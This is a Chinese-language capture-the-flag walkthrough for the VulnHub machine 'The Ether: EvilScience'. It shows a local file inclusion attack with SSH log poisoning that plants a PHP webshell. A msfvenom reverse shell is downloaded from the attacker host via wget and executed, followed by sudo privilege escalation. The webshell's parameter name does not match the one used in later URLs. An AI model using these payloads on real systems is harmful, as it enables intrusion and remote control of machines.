阅读量:0
靶机安装
下载地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/
运行环境:Vmware
信息收集
进行IP发现
nmap 192.168.93.0/24
进行端口扫描,开放了80和22端口
nmap -A 192.168.93.155 -p-
进行目录扫描
dirsearch -u http://192.168.93.155 -e *.php
网页访问IP网址
点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php
可能存在文件包含漏洞
拼接目录扫描出的目录,没有什么有用的信息,
对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破
标记之后,加入文件包含可能存在的文件的字典
/usr/local/apache2/logs/access_log /logs/access_log /etc/httpd/logs/access_log /var/log/httpd/access_log /var/log/auth.log
发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,
利用ssh登录产生错误日志写入一句话木马
ssh '<?php @system($_GET[cmd]);?>'@192.168.93.155
访问执行命令
获取shell
用msfvenom生成 shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=1234 -f elf > shell.elf 
开启监听
#开启环境 msfconsole use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost 192.168.93.130 set lport 1234 run 
在下载的shell.elf文件下面开启web服务,进行远程下载
python3 -m http.server
利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令
/?file=/var/log/auth.log&d1no=system('wget+192.168.93.130:8000/shell.elf')%3b /?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b /?file=/var/log/auth.log&d1no=system('./shell.elf')%3b 
三条命令执行完之后,发现监听成功
提权
先将获取到的shell转变为交互式的shell
#进入shell环境 shell python -c 'import pty;pty.spawn("/bin/bash")'
查询一下sudo提权
sudo -l
发现xxxlogauditorxxx.py 可以以 root 运行。
执行命令
sudo ./xxxlogauditorxxx.py /var/log/auth.log | whoami 
